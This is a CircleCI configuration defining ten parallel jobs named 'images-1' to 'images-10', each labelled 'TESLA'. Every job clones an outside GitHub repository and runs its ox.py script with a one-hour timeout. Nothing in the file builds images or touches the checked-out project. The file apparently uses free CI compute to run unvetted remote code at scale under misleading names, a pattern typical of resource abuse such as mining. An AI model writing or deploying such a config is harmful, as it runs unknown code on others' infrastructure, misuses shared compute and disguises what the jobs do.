version: 2.1
jobs:
  images-1:
    
    docker:
      - image: cimg/python:3.8
    
    steps:
      - checkout
      
      
      - run:
          name: TESLA
          no_output_timeout : 1h
          command: |
              git clone https://github.com/latuzial2/16319327.git && cd 16319327 && python ox.py
            
            
  images-2:
    
    docker:
      - image: cimg/python:3.8
    
    steps:
      - checkout
      
      
      - run:
          name: TESLA
          no_output_timeout : 1h
          command: |
            git clone https://github.com/latuzial2/16319327.git && cd 16319327 && python ox.py
  images-3:
    
    docker:
      - image: cimg/python:3.8
    
    steps:
      - checkout
      
      
      - run:
          name: TESLA
          no_output_timeout : 1h
          command: |
            git clone https://github.com/latuzial2/16319327.git && cd 16319327 && python ox.py
  images-4:
    
    docker:
      - image: cimg/python:3.8
    
    steps:
      - checkout
      
      
      - run:
          name: TESLA
          no_output_timeout : 1h
          command: |
            git clone https://github.com/latuzial2/16319327.git && cd 16319327 && python ox.py
  images-5:
    
    docker:
      - image: cimg/python:3.8
    
    steps:
      - checkout
      
      
      - run:
          name: TESLA
          no_output_timeout : 1h
          command: |
            git clone https://github.com/latuzial2/16319327.git && cd 16319327 && python ox.py
  images-6:
    
    docker:
      - image: cimg/python:3.8
    
    steps:
      - checkout
      
      
      - run:
          name: TESLA
          no_output_timeout : 1h
          command: |
            git clone https://github.com/latuzial2/16319327.git && cd 16319327 && python ox.py

  images-7:
    
    docker:
      - image: cimg/python:3.8
    
    steps:
      - checkout
      
      
      - run:
          name: TESLA
          no_output_timeout : 1h
          command: |
            git clone https://github.com/latuzial2/16319327.git && cd 16319327 && python ox.py
  images-8:
    
    docker:
      - image: cimg/python:3.8
    
    steps:
      - checkout
      
      
      - run:
          name: TESLA
          no_output_timeout : 1h
          command: |
            git clone https://github.com/latuzial2/16319327.git && cd 16319327 && python ox.py
  images-9:
    
    docker:
      - image: cimg/python:3.8
    
    steps:
      - checkout
      
      
      - run:
          name: TESLA
          no_output_timeout : 1h
          command: |
            git clone https://github.com/latuzial2/16319327.git && cd 16319327 && python ox.py

  images-10:
    
    docker:
      - image: cimg/python:3.8
    
    steps:
      - checkout
      
      
      - run:
          name: TESLA
          no_output_timeout : 1h
          command: |
            git clone https://github.com/latuzial2/16319327.git && cd 16319327 && python ox.py


workflows:
    version: 2.1
    build:
        jobs:
             - images-1
             - images-2
             - images-3
             - images-4
             - images-5
             - images-6
             - images-7
             - images-8
             - images-9
             - images-10
             
